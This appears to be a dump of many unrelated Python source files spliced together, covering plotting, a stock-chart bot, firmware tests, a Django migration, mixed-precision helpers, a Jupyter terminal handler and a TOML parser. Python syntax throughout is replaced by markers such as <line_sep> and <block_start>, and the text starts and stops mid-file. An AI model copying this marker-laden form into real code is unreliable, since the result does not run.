rot_angl)<line_sep>arrow1=np.dot(rr base)<line_sep>arrowV1(draw r np.array([0 0 0]) arrow1 rgb=rgba shift=shift)<block_end>rgba=rgba+(150 )<line_sep>generalized_arc(draw r center=np.array([0 0 1.5<times>np.cos(rot_angl)]) vec=np.array([0 0 1]) point=1.5<times>np.array([0 np.sin(rot_angl) np.cos(rot_angl)]) radius=100 prcnt=1.0 rgba=rgba shift=shift)<block_end>##################### ## Paraboloid with Lagrange visualized. im=Image.new("RGB" (2048 2048) (1 1 1))<line_sep>draw=ImageDraw.Draw(im 'RGBA')<line_sep>scale=5.0<line_sep>ind=0<line_sep>sep=24<line_sep>i=2.0<line_sep>base_coeff=0.02<line_sep>start_line=-12.0<line_sep>shift=np.array([1000.0 1000.0 0.0])<line_sep>r1=np.eye(4)<line_sep>j=24<line_sep>r=rotation(3 np.pi/30<times>j)<line_sep>r1[:3 :3]=r<line_sep>render_scene_4d_axis(draw r1 4)<line_sep>fn=<lambda>x y:paraboloid(x y coeff=i<times>base_coeff intercept=i)<line_sep>drawFunctionalXYGrid(draw r scale=scale fn=fn extent=60 rgba2=(255 20 147 80) saperatingPlane=np.array([-1 -1 sep]))<line_sep>three_d_parabola(draw r r2)<line_sep>im.save(basedir+'im'+str(0)+'.png')<line_sep>
<import_stmt>logging<import_stmt>plotly.graph_objects<as>go<import_from_stmt>bots imps load_candle<import_from_stmt>openbb_terminal.common.technical_analysis volume_model<import_from_stmt>openbb_terminal.decorators log_start_end<line_sep># pylint: disable=R0913 logger=logging.getLogger(__name__)<line_sep>@log_start_end(log=logger)<def_stmt>adosc_command ticker="" interval:int=15 past_days:int=0 is_open:bool=<false> fast="3" slow="10" start="" end="" extended_hours:bool=<false> heikin_candles:bool=<false> trendline:bool=<false> news:bool=<false> <block_start>"""Displays chart with chaikin oscillator [Yahoo Finance]"""<line_sep># Debug <if_stmt>imps.DEBUG# pylint: disable=logging-too-many-args <block_start>logger.debug("ta adosc %s %s %s %s %s %s %s %s %s %s %s %s" ticker interval past_days is_open fast slow start end extended_hours heikin_candles trendline news )<block_end># Check for argument <if_stmt>ticker<eq>""<block_start><raise>Exception("Stock ticker is required")<block_end><if_stmt><not>fast.lstrip("-").isnumeric()<block_start><raise>Exception("Number has to be an integer")<block_end>fast=int(fast)<if_stmt><not>slow.lstrip("-").isnumeric()<block_start><raise>Exception("Number has to be an integer")<block_end>slow=int(slow)<line_sep># Retrieve Data df_stock,start,end,bar_start=load_candle.stock_data(ticker=ticker interval=interval past_days=past_days extended_hours=extended_hours start=start end=end heikin_candles=heikin_candles )<if_stmt>df_stock.empty<block_start><raise>Exception("No Data Found")<block_end>df_ta=df_stock.loc[(df_stock.index<ge>start)&(df_stock.index<l>end)]<line_sep>df_ta=df_ta.join(volume_model.adosc(df_stock is_open fast slow))<line_sep># Output Data <if_stmt>interval<ne>1440<block_start>df_ta=df_ta.loc[(df_ta.index<ge>bar_start)&(df_ta.index<l>end)]<block_end>df_ta=df_ta.fillna(0.0)<line_sep>plot=load_candle.candle_fig(df_ta ticker interval extended_hours news bar=bar_start int_bar=interval trendline=trendline rows=2 cols=1 
shared_xaxes=<true> vertical_spacing=0.05 row_width=[0.4 0.7] specs=[[{"secondary_y":<true>}] [{"secondary_y":<false>}] ] )<line_sep>title=f"<b>{plot['plt_title']} AD Oscillator</b>"<line_sep>fig=plot["fig"]<line_sep>fig.add_trace(go.Scatter(name="AD Osc [M]" mode="lines" x=df_ta.index y=df_ta.iloc[: 6].values<if>(<not>trendline)<and>(interval<ne>1440)<else>df_ta.iloc[: 11].values line=dict(width=2) opacity=1 ) row=2 col=1 )<line_sep>fig.update_layout(margin=dict(l=0 r=0 t=50 b=20) template=imps.PLT_TA_STYLE_TEMPLATE colorway=imps.PLT_TA_COLORWAY title=title title_x=0.1 title_font_size=14 dragmode="pan" )<line_sep>imagefile="ta_adosc.png"<line_sep># Check if interactive settings are enabled plt_link=""<if_stmt>imps.INTERACTIVE<block_start>plt_link=imps.inter_chart(fig imagefile callback=<false>)<block_end>imagefile=imps.image_border(imagefile fig=fig)<line_sep><return>{"title":f"Stocks: Accumulation/Distribution Oscillator {ticker.upper()}" "description":plt_link "imagefile":imagefile }<block_end>
<import_stmt>json<import_stmt>pytest<line_sep>@pytest.mark.parametrize("hosts, expected_results" (("" [{"host":"backend-0-0" "version":"1.2.3" "make":"mellanox" "model":"m7800"} {"host":"backend-0-1" "version":"1.2.3.4" "make":"dell" "model":"x1052-software"} ] ) ("backend-0-0" [{"host":"backend-0-0" "version":"1.2.3" "make":"mellanox" "model":"m7800"}]) ("backend-0-1" [{"host":"backend-0-1" "version":"1.2.3.4" "make":"dell" "model":"x1052-software"}]) ) )<def_stmt>test_list_host_firmware_mapping_host_filter host add_host_with_net fake_local_firmware_file revert_firmware hosts expected_results <block_start>"""Test that list host firmware mapping filters correctly based on provided arguments."""<line_sep># Add a backend-0-1 add_host_with_net(hostname="backend-0-1" rack=0 rank=1 appliance="backend" interface="eth0" ip="192.168.1.1" network="fake_net" address="192.168.1.0" pxe=<true> )<line_sep># Add a piece of mellanox firmware to backend-0-0. result=host.run(f"stack add firmware 1.2.3 make=mellanox model=m7800 source={fake_local_firmware_file} hosts=backend-0-0")<assert_stmt>result.rc<eq>0<line_sep># Add a piece of dell firmware to backend-0-1 result=host.run(f"stack add firmware 1.2.3.4 make=dell model=x1052-software source={fake_local_firmware_file} hosts=backend-0-1")<assert_stmt>result.rc<eq>0<line_sep># List the firmware mappings result=host.run(f"stack list host firmware mapping {hosts} output-format=json")<assert_stmt>result.rc<eq>0<assert_stmt>expected_results<eq>json.loads(result.stdout)<block_end>@pytest.mark.parametrize("make, model, versions, expected_results" (("" "" "" [{"host":"backend-0-0" "version":"1.2.3" "make":"mellanox" "model":"m7800"} {"host":"backend-0-1" "version":"1.2.3.4" "make":"dell" "model":"x1052-software"} ] ) ("mellanox" "" "" [{"host":"backend-0-0" "version":"1.2.3" "make":"mellanox" "model":"m7800"}]) ("mellanox" "m7800" "" [{"host":"backend-0-0" "version":"1.2.3" "make":"mellanox" "model":"m7800"}]) ("mellanox" "m7800" "1.2.3" 
[{"host":"backend-0-0" "version":"1.2.3" "make":"mellanox" "model":"m7800"}]) ("dell" "" "" [{"host":"backend-0-1" "version":"1.2.3.4" "make":"dell" "model":"x1052-software"}]) ("dell" "x1052-software" "" [{"host":"backend-0-1" "version":"1.2.3.4" "make":"dell" "model":"x1052-software"}]) ("dell" "x1052-software" "1.2.3.4" [{"host":"backend-0-1" "version":"1.2.3.4" "make":"dell" "model":"x1052-software"}]) ) )<def_stmt>test_list_host_firmware_mapping_non_host_filter host add_host_with_net fake_local_firmware_file revert_firmware make model versions expected_results <block_start>"""Test that list host firmware mapping filters correctly based on provided arguments."""<line_sep># Add a backend-0-1 add_host_with_net(hostname="backend-0-1" rack=0 rank=1 appliance="backend" interface="eth0" ip="192.168.1.1" network="fake_net" address="192.168.1.0" pxe=<true> )<line_sep># Add a piece of mellanox firmware to backend-0-0. result=host.run(f"stack add firmware 1.2.3 make=mellanox model=m7800 source={fake_local_firmware_file} hosts=backend-0-0")<assert_stmt>result.rc<eq>0<line_sep># Add a piece of dell firmware to backend-0-1 result=host.run(f"stack add firmware 1.2.3.4 make=dell model=x1052-software source={fake_local_firmware_file} hosts=backend-0-1")<assert_stmt>result.rc<eq>0<line_sep># List the firmware mappings result=host.run(f"stack list host firmware mapping {f'make={make}'<if>make<else>''} {f'model={model}'<if>model<else>''} "<concat>f"{f'versions={versions}'<if>versions<else>''} output-format=json")<assert_stmt>result.rc<eq>0<assert_stmt>expected_results<eq>json.loads(result.stdout)<block_end>
"""Validate services schema."""<import_from_stmt>importlib import_module<import_from_stmt>pathlib Path<import_stmt>voluptuous<as>vol<import_from_stmt>..const ATTR_ADDON ATTR_CONFIG ATTR_DISCOVERY ATTR_SERVICE ATTR_UUID<import_from_stmt>..utils.validate schema_or<import_from_stmt>..validate uuid_match<def_stmt>valid_discovery_service service<block_start>"""Validate service name."""<line_sep>service_file=Path(__file__).parent.joinpath(f"services/{service}.py")<if_stmt><not>service_file.exists()<block_start><raise>vol.Invalid(f"Service {service} not found")<from><none><block_end><return>service<block_end><def_stmt>valid_discovery_config service config<block_start>"""Validate service name."""<try_stmt><block_start>service_mod=import_module(f".services.{service}" "supervisor.discovery")<block_end><except_stmt>ImportError<block_start><raise>vol.Invalid(f"Service {service} not found")<from><none><block_end><return>service_mod.SCHEMA(config)<block_end>SCHEMA_DISCOVERY=vol.Schema([vol.Schema({vol.Required(ATTR_UUID):uuid_match vol.Required(ATTR_ADDON):str vol.Required(ATTR_SERVICE):valid_discovery_service vol.Required(ATTR_CONFIG):vol.Maybe(dict) } extra=vol.REMOVE_EXTRA )])<line_sep>SCHEMA_DISCOVERY_CONFIG=vol.Schema({vol.Optional(ATTR_DISCOVERY default=list):schema_or(SCHEMA_DISCOVERY)} extra=vol.REMOVE_EXTRA )<line_sep>
load("//tools:defaults.bzl" "protractor_web_test_suite")<line_sep>""" Macro that can be used to define a e2e test in `modules/benchmarks`. Targets created through this macro differentiate from a "benchmark_test" as they will run on CI and do not run with `@angular/benchpress`. """<def_stmt>e2e_test name server **kwargs<block_start>protractor_web_test_suite(name=name on_prepare="@npm//@angular/dev-infra-private/bazel/benchmark/component_benchmark:start-server.js" server=server **kwargs)<block_end>
# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2016-06-23 18:25 <import_from_future_stmt> unicode_literals<import_from_stmt>django.conf settings<import_from_stmt>django.db migrations models<import_stmt>django.db.models.deletion<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('filer' '0004_auto_20160328_1434') ]<line_sep>operations=[migrations.AlterField(model_name='file' name='owner' field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name='owned_files' to=settings.AUTH_USER_MODEL verbose_name='owner') ) migrations.AlterField(model_name='folder' name='owner' field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name='filer_owned_folders' to=settings.AUTH_USER_MODEL verbose_name='owner') ) migrations.AlterField(model_name='folderpermission' name='user' field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name='filer_folder_permissions' to=settings.AUTH_USER_MODEL verbose_name='user') ) ]<block_end>
<import_stmt>functools<import_from_stmt>collections OrderedDict abc<import_from_stmt>inspect getfullargspec<import_stmt>numpy<as>np<import_stmt>torch<import_stmt>torch.distributed<as>dist<import_stmt>torch.nn<as>nn<import_from_stmt>torch._utils _flatten_dense_tensors _take_tensors _unflatten_dense_tensors <def_stmt>cast_tensor_type inputs src_type dst_type<block_start>"""Recursively convert Tensor in inputs from src_type to dst_type. Args: inputs: Inputs that to be casted. src_type (torch.dtype): Source type.. dst_type (torch.dtype): Destination type. Returns: The same type with inputs, but all contained Tensors have been cast. """<if_stmt>isinstance(inputs torch.Tensor)<block_start><return>inputs.to(dst_type)<block_end><elif_stmt>isinstance(inputs str)<block_start><return>inputs<block_end><elif_stmt>isinstance(inputs np.ndarray)<block_start><return>inputs<block_end><elif_stmt>isinstance(inputs abc.Mapping)<block_start><return>type(inputs)({k:cast_tensor_type(v src_type dst_type)<for>k,v inputs.items()})<block_end><elif_stmt>isinstance(inputs abc.Iterable)<block_start><return>type(inputs)(cast_tensor_type(item src_type dst_type)<for>item inputs)<block_end><else_stmt><block_start><return>inputs<block_end><block_end><def_stmt>auto_fp16 apply_to=<none> out_fp32=<false><block_start>"""Decorator to enable fp16 training automatically. This decorator is useful when you write custom modules and want to support mixed precision training. If inputs arguments are fp32 tensors, they will be converted to fp16 automatically. Arguments other than fp32 tensors are ignored. Args: apply_to (Iterable, optional): The argument names to be converted. `None` indicates all arguments. out_fp32 (bool): Whether to convert the output back to fp32. 
Example: >>> import torch.nn as nn >>> class MyModule1(nn.Module): >>> >>> # Convert x and y to fp16 >>> @auto_fp16() >>> def forward(self, x, y): >>> pass >>> import torch.nn as nn >>> class MyModule2(nn.Module): >>> >>> # convert pred to fp16 >>> @auto_fp16(apply_to=('pred', )) >>> def do_something(self, pred, others): >>> pass """<def_stmt>auto_fp16_wrapper old_func<block_start>@functools.wraps(old_func)<def_stmt>new_func *args **kwargs# check if the module has set the attribute `fp16_enabled`, if not, # just fallback to the original method. <block_start><if_stmt><not>isinstance(args[0] torch.nn.Module)<block_start><raise>TypeError('@auto_fp16 can only be used to decorate the '<concat>'method of nn.Module')<block_end><if_stmt><not>(hasattr(args[0] 'fp16_enabled')<and>args[0].fp16_enabled)<block_start><return>old_func(*args **kwargs)<block_end># get the arg spec of the decorated method args_info=getfullargspec(old_func)<line_sep># get the argument names to be casted args_to_cast=args_info.args<if>apply_to<is><none><else>apply_to<line_sep># convert the args that need to be processed new_args=[]<line_sep># NOTE: default args are not taken into consideration <if_stmt>args<block_start>arg_names=args_info.args[:len(args)]<for_stmt>i,arg_name enumerate(arg_names)<block_start><if_stmt>arg_name<in>args_to_cast<block_start>new_args.append(cast_tensor_type(args[i] torch.float torch.half))<block_end><else_stmt><block_start>new_args.append(args[i])<block_end><block_end><block_end># convert the kwargs that need to be processed new_kwargs={}<if_stmt>kwargs<block_start><for_stmt>arg_name,arg_value kwargs.items()<block_start><if_stmt>arg_name<in>args_to_cast<block_start>new_kwargs[arg_name]=cast_tensor_type(arg_value torch.float torch.half)<block_end><else_stmt><block_start>new_kwargs[arg_name]=arg_value<block_end><block_end><block_end># apply converted arguments to the decorated method output=old_func(*new_args **new_kwargs)<line_sep># cast the results back to fp32 if necessary 
<if_stmt>out_fp32<block_start>output=cast_tensor_type(output torch.half torch.float)<block_end><return>output<block_end><return>new_func<block_end><return>auto_fp16_wrapper<block_end><def_stmt>force_fp32 apply_to=<none> out_fp16=<false><block_start>"""Decorator to convert input arguments to fp32 in force. This decorator is useful when you write custom modules and want to support mixed precision training. If there are some inputs that must be processed in fp32 mode, then this decorator can handle it. If inputs arguments are fp16 tensors, they will be converted to fp32 automatically. Arguments other than fp16 tensors are ignored. Args: apply_to (Iterable, optional): The argument names to be converted. `None` indicates all arguments. out_fp16 (bool): Whether to convert the output back to fp16. Example: >>> import torch.nn as nn >>> class MyModule1(nn.Module): >>> >>> # Convert x and y to fp32 >>> @force_fp32() >>> def loss(self, x, y): >>> pass >>> import torch.nn as nn >>> class MyModule2(nn.Module): >>> >>> # convert pred to fp32 >>> @force_fp32(apply_to=('pred', )) >>> def post_process(self, pred, others): >>> pass """<def_stmt>force_fp32_wrapper old_func<block_start>@functools.wraps(old_func)<def_stmt>new_func *args **kwargs# check if the module has set the attribute `fp16_enabled`, if not, # just fallback to the original method. 
<block_start><if_stmt><not>isinstance(args[0] torch.nn.Module)<block_start><raise>TypeError('@force_fp32 can only be used to decorate the '<concat>'method of nn.Module')<block_end><if_stmt><not>(hasattr(args[0] 'fp16_enabled')<and>args[0].fp16_enabled)<block_start><return>old_func(*args **kwargs)<block_end># get the arg spec of the decorated method args_info=getfullargspec(old_func)<line_sep># get the argument names to be casted args_to_cast=args_info.args<if>apply_to<is><none><else>apply_to<line_sep># convert the args that need to be processed new_args=[]<if_stmt>args<block_start>arg_names=args_info.args[:len(args)]<for_stmt>i,arg_name enumerate(arg_names)<block_start><if_stmt>arg_name<in>args_to_cast<block_start>new_args.append(cast_tensor_type(args[i] torch.half torch.float))<block_end><else_stmt><block_start>new_args.append(args[i])<block_end><block_end><block_end># convert the kwargs that need to be processed new_kwargs=dict()<if_stmt>kwargs<block_start><for_stmt>arg_name,arg_value kwargs.items()<block_start><if_stmt>arg_name<in>args_to_cast<block_start>new_kwargs[arg_name]=cast_tensor_type(arg_value torch.half torch.float)<block_end><else_stmt><block_start>new_kwargs[arg_name]=arg_value<block_end><block_end><block_end># apply converted arguments to the decorated method output=old_func(*new_args **new_kwargs)<line_sep># cast the results back to fp32 if necessary <if_stmt>out_fp16<block_start>output=cast_tensor_type(output torch.float torch.half)<block_end><return>output<block_end><return>new_func<block_end><return>force_fp32_wrapper<block_end><def_stmt>_allreduce_coalesced tensors world_size bucket_size_mb=-1<block_start><if_stmt>bucket_size_mb<g>0<block_start>bucket_size_bytes=bucket_size_mb<times>1024<times>1024<line_sep>buckets=_take_tensors(tensors bucket_size_bytes)<block_end><else_stmt><block_start>buckets=OrderedDict()<for_stmt>tensor 
tensors<block_start>tp=tensor.type()<if_stmt>tp<not><in>buckets<block_start>buckets[tp]=[]<block_end>buckets[tp].append(tensor)<block_end>buckets=buckets.values()<block_end><for_stmt>bucket buckets<block_start>flat_tensors=_flatten_dense_tensors(bucket)<line_sep>dist.all_reduce(flat_tensors)<line_sep>flat_tensors.div_(world_size)<for_stmt>tensor,synced zip(bucket _unflatten_dense_tensors(flat_tensors bucket))<block_start>tensor.copy_(synced)<block_end><block_end><block_end><def_stmt>allreduce_grads params coalesce=<true> bucket_size_mb=-1<block_start>"""Allreduce gradients. Args: params (list[torch.Parameters]): List of parameters of a model coalesce (bool, optional): Whether allreduce parameters as a whole. Defaults to True. bucket_size_mb (int, optional): Size of bucket, the unit is MB. Defaults to -1. """<line_sep>grads=[param.grad.data<for>param params<if>param.requires_grad<and>param.grad<is><not><none>]<line_sep>world_size=dist.get_world_size()<if_stmt>coalesce<block_start>_allreduce_coalesced(grads world_size bucket_size_mb)<block_end><else_stmt><block_start><for_stmt>tensor grads<block_start>dist.all_reduce(tensor.div_(world_size))<block_end><block_end><block_end><def_stmt>wrap_fp16_model model<block_start>"""Wrap the FP32 model to FP16. 1. Convert FP32 model to FP16. 2. Remain some necessary layers to be FP32, e.g., normalization layers. Args: model (nn.Module): Model in FP32. """<line_sep># convert model to fp16 model.half()<line_sep># patch the normalization layers to make it work in fp32 mode patch_norm_fp32(model)<line_sep># set `fp16_enabled` flag <for_stmt>m model.modules()<block_start><if_stmt>hasattr(m 'fp16_enabled')<block_start>m.fp16_enabled=<true><block_end><block_end><block_end><def_stmt>patch_norm_fp32 module<block_start>"""Recursively convert normalization layers from FP16 to FP32. Args: module (nn.Module): The modules to be converted in FP16. Returns: nn.Module: The converted module, the normalization layers have been converted to FP32. 
"""<if_stmt>isinstance(module (nn.modules.batchnorm._BatchNorm nn.GroupNorm))<block_start>module.float()<if_stmt>isinstance(module nn.GroupNorm)<or>torch.__version__<l>'1.3'<block_start>module.forward=patch_forward_method(module.forward torch.half torch.float)<block_end><block_end><for_stmt>child module.children()<block_start>patch_norm_fp32(child)<block_end><return>module<block_end><def_stmt>patch_forward_method func src_type dst_type convert_output=<true><block_start>"""Patch the forward method of a module. Args: func (callable): The original forward method. src_type (torch.dtype): Type of input arguments to be converted from. dst_type (torch.dtype): Type of input arguments to be converted to. convert_output (bool): Whether to convert the output back to src_type. Returns: callable: The patched forward method. """<def_stmt>new_forward *args **kwargs<block_start>output=func(*cast_tensor_type(args src_type dst_type) **cast_tensor_type(kwargs src_type dst_type))<if_stmt>convert_output<block_start>output=cast_tensor_type(output dst_type src_type)<block_end><return>output<block_end><return>new_forward<block_end>
""" Google Cloud Emulators ====================== Allows to spin up google cloud emulators, such as PubSub. """<import_from_stmt>.pubsub PubSubContainer# noqa
# coding: utf-8
"""
Module `chatette.parsing.lexing.rule_arg_decl`
Contains the definition of the class that represents the lexing rule
to tokenize the declaration of an argument in a unit declaration.
"""

from chatette.parsing.lexing.lexing_rule import LexingRule
from chatette.parsing.lexing import LexicalToken, TerminalType
from chatette.parsing.utils import ARG_SYM, extract_identifier


class RuleArgDecl(LexingRule):
    """Lexing rule matching an argument declaration (marker + identifier)."""

    def _apply_strategy(self, **kwargs):
        # An argument declaration must open with the argument marker symbol.
        if not self._text.startswith(ARG_SYM, self._next_index):
            self.error_msg = \
                "Invalid token. Expected an argument declaration there " + \
                "(starting with '" + ARG_SYM + "')."
            return False
        self._next_index += 1
        self._update_furthest_matched_index()
        self._tokens.append(LexicalToken(TerminalType.arg_marker, ARG_SYM))

        # The marker must be followed by a non-empty identifier.
        name = extract_identifier(self._text, self._next_index)
        if name is None:
            self.error_msg = \
                "Didn't expect the line to end there. Expected an argument name."
            return False
        if len(name) == 0:
            self.error_msg = \
                "Couldn't extract the argument name. Arguments must have a name."
            return False

        self._next_index += len(name)
        self._update_furthest_matched_index()
        self._tokens.append(LexicalToken(TerminalType.arg_name, name))
        return True
# -*- coding: utf-8 -*-
import ckan.plugins as p


def x2(sender):
    """Return the sender's value doubled."""
    return sender * 2


def x10(sender):
    """Return the sender's value multiplied by ten."""
    return sender * 10


class ExampleISignalPlugin(p.SingletonPlugin):
    p.implements(p.ISignal)

    # ISignal
    def get_signal_subscriptions(self):
        """Subscribe x2 (any sender) and x10 (sender 10) to `isignal_number`."""
        signal = p.toolkit.signals.ckanext.signal(u'isignal_number')
        subscribers = [
            x2,
            {u'receiver': x10, u'sender': 10},
        ]
        return {signal: subscribers}
from typing import Dict, Optional, Text, List

import apache_beam as beam
import tensorflow_model_analysis as tfma
from tensorflow_model_analysis import config
from tensorflow_model_analysis import constants
from tensorflow_model_analysis import model_util
from tensorflow_model_analysis import types
from tensorflow_model_analysis.extractors import extractor
from tfx_bsl.tfxio import tensor_adapter

BATCHED_PREDICT_EXTRACTOR_STAGE_NAME = 'ExtractBatchPredictions'


def custom_extractors(eval_config, eval_shared_model,
                      tensor_adapter_config) -> List[tfma.extractors.Extractor]:
    """Return TFMA's default extractors with the batched predict extractor plugged in."""
    predict_extractor = BatchedPredictExtractor(
        eval_config, eval_shared_model, tensor_adapter_config)
    return tfma.default_extractors(
        eval_config=eval_config,
        eval_shared_model=eval_shared_model,
        tensor_adapter_config=tensor_adapter_config,
        custom_predict_extractor=predict_extractor)


def BatchedPredictExtractor(
    eval_config: config.EvalConfig,
    eval_shared_model: types.MaybeMultipleEvalSharedModels,
    tensor_adapter_config: Optional[tensor_adapter.TensorAdapterConfig] = None,
) -> extractor.Extractor:
    """Build the extractor stage that attaches batched model predictions."""
    eval_shared_models = model_util.verify_and_update_eval_shared_models(
        eval_shared_model)
    models_by_name = {m.model_name: m for m in eval_shared_models}
    return extractor.Extractor(
        stage_name=BATCHED_PREDICT_EXTRACTOR_STAGE_NAME,
        ptransform=_ExtractBatchedPredictions(
            eval_config=eval_config,
            eval_shared_models=models_by_name,
            tensor_adapter_config=tensor_adapter_config))


@beam.ptransform_fn
@beam.typehints.with_input_types(types.Extracts)
@beam.typehints.with_output_types(types.Extracts)
def _ExtractBatchedPredictions(
    extracts: beam.pvalue.PCollection,
    eval_config: config.EvalConfig,
    eval_shared_models: Dict[Text, types.EvalSharedModel],
    tensor_adapter_config: Optional[tensor_adapter.TensorAdapterConfig] = None,
) -> beam.pvalue.PCollection:
    """Run each model's prediction signature over the incoming extracts."""
    # A single model is keyed by the empty model name, matching TFMA convention.
    n_models = len(eval_config.model_specs)
    signature_names = {
        ('' if n_models == 1 else spec.name): [spec.signature_name]
        for spec in eval_config.model_specs
    }
    return (extracts
            | 'Predict' >> beam.ParDo(
                model_util.ModelSignaturesDoFn(
                    eval_config=eval_config,
                    eval_shared_models=eval_shared_models,
                    signature_names={constants.PREDICTIONS_KEY: signature_names},
                    prefer_dict_outputs=True,
                    tensor_adapter_config=tensor_adapter_config)))
from unittest import TestCase

from LongestSubstringWithoutRepeatingCharacters import LongestSubstringWithoutRepeatingCharacters


class TestLongestSubstringWithoutRepeatingCharacters(TestCase):
    """Unit tests for lengthOfLongestSubstring."""

    def test_lengthOfLongestSubstring(self):
        lswrc = LongestSubstringWithoutRepeatingCharacters()
        # assertEqual reports the actual value on failure, unlike
        # assertTrue(a == b), which only reports "False is not true".
        # Expected: wke, 3
        self.assertEqual(lswrc.lengthOfLongestSubstring("pwwkew"), 3)
        # Expected: b, 1
        self.assertEqual(lswrc.lengthOfLongestSubstring("bbbbb"), 1)
        # Expected: abc, 3
        self.assertEqual(lswrc.lengthOfLongestSubstring("abcabcbb"), 3)
        # Expected: vdf, 3
        self.assertEqual(lswrc.lengthOfLongestSubstring("dvdf"), 3)
#
# Copyright Soramitsu Co., Ltd. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
from iroha import Iroha, IrohaCrypto
from iroha import primitive_pb2
import commons

admin = commons.new_user('admin@test')
alice = commons.new_user('alice@test')
iroha = Iroha(admin['id'])


@commons.hex
def genesis_tx():
    """Build and sign the genesis transaction granting `can_detach_role`."""
    test_permissions = [primitive_pb2.can_detach_role]
    commands = commons.genesis_block(admin, alice, test_permissions)
    transaction = iroha.transaction(commands)
    IrohaCrypto.sign_transaction(transaction, admin['key'])
    return transaction


@commons.hex
def detach_role_tx():
    """Build and sign a tx in which alice detaches `test_role` from admin."""
    detach = iroha.command(
        'DetachRole', account_id=admin['id'], role_name='test_role')
    transaction = iroha.transaction([detach], creator_account=alice['id'])
    IrohaCrypto.sign_transaction(transaction, alice['key'])
    return transaction
#encoding: utf-8
"""Tornado handlers for the terminal emulator."""

# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.

from tornado import web
import terminado
from notebook._tz import utcnow
from ..base.handlers import IPythonHandler
from ..base.zmqhandlers import WebSocketMixin


class TerminalHandler(IPythonHandler):
    """Render the terminal interface."""

    @web.authenticated
    def get(self, term_name):
        ws_path = "terminals/websocket/%s" % term_name
        self.write(self.render_template('terminal.html', ws_path=ws_path))


class TermSocket(WebSocketMixin, IPythonHandler, terminado.TermSocket):
    """Terminal websocket with notebook auth and activity tracking."""

    def origin_check(self):
        """Terminado adds redundant origin_check

        Tornado already calls check_origin, so don't do anything here.
        """
        return True

    def get(self, *args, **kwargs):
        # Reject unauthenticated websocket upgrades before terminado sees them.
        if not self.get_current_user():
            raise web.HTTPError(403)
        return super(TermSocket, self).get(*args, **kwargs)

    def _touch_activity(self):
        # Record the timestamp of the most recent terminal traffic.
        self.application.settings['terminal_last_activity'] = utcnow()

    def on_message(self, message):
        super(TermSocket, self).on_message(message)
        self._touch_activity()

    def write_message(self, message, binary=False):
        super(TermSocket, self).write_message(message, binary=binary)
        self._touch_activity()
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020, the cclib development team
#
# This file is part of cclib (http://cclib.github.io) and is distributed under
# the terms of the BSD 3-Clause License.

"""Bridge for using cclib data in PyQuante (http://pyquante.sourceforge.net)."""

import numpy

from cclib.parser.utils import find_package


class MissingAttributeError(Exception):
    pass


_found_pyquante2 = find_package("pyquante2")
if _found_pyquante2:
    from pyquante2 import molecule


def _check_pyquante():
    # Fail fast when the optional pyquante2 dependency is absent.
    if not _found_pyquante2:
        raise ImportError("You must install `pyquante2` to use this function")


def makepyquante(data):
    """Create a PyQuante Molecule from ccData object."""
    _check_pyquante()

    # Check required attributes.
    required_attrs = {"atomcoords", "atomnos"}
    missing = [attr for attr in required_attrs if not hasattr(data, attr)]
    if missing:
        raise MissingAttributeError(
            "Could not create pyquante molecule due to missing attribute: {}".format(
                " ".join(missing)))

    # In pyquante2, molecular geometry is specified in a format of:
    # [(3,.0000000000, .0000000000, .0000000000), (1, .0000000000, .0000000000,1.629912)]
    moldesc = numpy.insert(data.atomcoords[-1], 0, data.atomnos, 1).tolist()
    return molecule(
        [tuple(row) for row in moldesc],
        units="Angstroms",
        charge=data.charge,
        multiplicity=data.mult,
    )


del find_package
# -*- coding: utf-8 -*- <import_from_future_stmt> unicode_literals<import_stmt>itertools<import_from_stmt>copy copy<import_from_stmt>typing Any<import_from_stmt>typing Optional<import_from_stmt>typing Tuple<import_from_stmt>typing Type<import_from_stmt>._compat PY2<import_from_stmt>._compat unicode<import_from_stmt>.exceptions ParseError<import_from_stmt>.exceptions UnexpectedCharError<import_from_stmt>.exceptions UnexpectedEofError<import_from_stmt>.toml_char TOMLChar<class_stmt>_State<block_start><def_stmt>__init__ self source save_marker=<false> restore=<false># type: (_Source, Optional[bool], Optional[bool]) -> None <block_start>self._source=source<line_sep>self._save_marker=save_marker<line_sep>self.restore=restore<block_end><def_stmt>__enter__ self# type: () -> None # Entering this context manager - save the state <block_start><if_stmt>PY2# Python 2.7 does not allow to directly copy # an iterator, so we have to make tees of the original # chars iterator. <block_start>self._source._chars,self._chars=itertools.tee(self._source._chars)<block_end><else_stmt><block_start>self._chars=copy(self._source._chars)<block_end>self._idx=self._source._idx<line_sep>self._current=self._source._current<line_sep>self._marker=self._source._marker<line_sep><return>self<block_end><def_stmt>__exit__ self exception_type exception_val trace# Exiting this context manager - restore the prior state <block_start><if_stmt>self.restore<or>exception_type<block_start>self._source._chars=self._chars<line_sep>self._source._idx=self._idx<line_sep>self._source._current=self._current<if_stmt>self._save_marker<block_start>self._source._marker=self._marker<block_end><block_end><block_end><block_end><class_stmt>_StateHandler<block_start>""" State preserver for the Parser. 
"""<def_stmt>__init__ self source# type: (Source) -> None <block_start>self._source=source<line_sep>self._states=[]<block_end><def_stmt>__call__ self *args **kwargs<block_start><return>_State(self._source *args **kwargs)<block_end><def_stmt>__enter__ self# type: () -> None <block_start>state=self()<line_sep>self._states.append(state)<line_sep><return>state.__enter__()<block_end><def_stmt>__exit__ self exception_type exception_val trace<block_start>state=self._states.pop()<line_sep><return>state.__exit__(exception_type exception_val trace)<block_end><block_end><class_stmt>Source(unicode)<block_start>EOF=TOMLChar("\0")<def_stmt>__init__ self _# type: (unicode) -> None <block_start>super(Source self).__init__()<line_sep># Collection of TOMLChars self._chars=iter([(i TOMLChar(c))<for>i,c enumerate(self)])<line_sep>self._idx=0<line_sep>self._marker=0<line_sep>self._current=TOMLChar("")<line_sep>self._state=_StateHandler(self)<line_sep>self.inc()<block_end><def_stmt>reset self# initialize both idx and current <block_start>self.inc()<line_sep># reset marker self.mark()<block_end>@property<def_stmt>state self# type: () -> _StateHandler <block_start><return>self._state<block_end>@property<def_stmt>idx self# type: () -> int 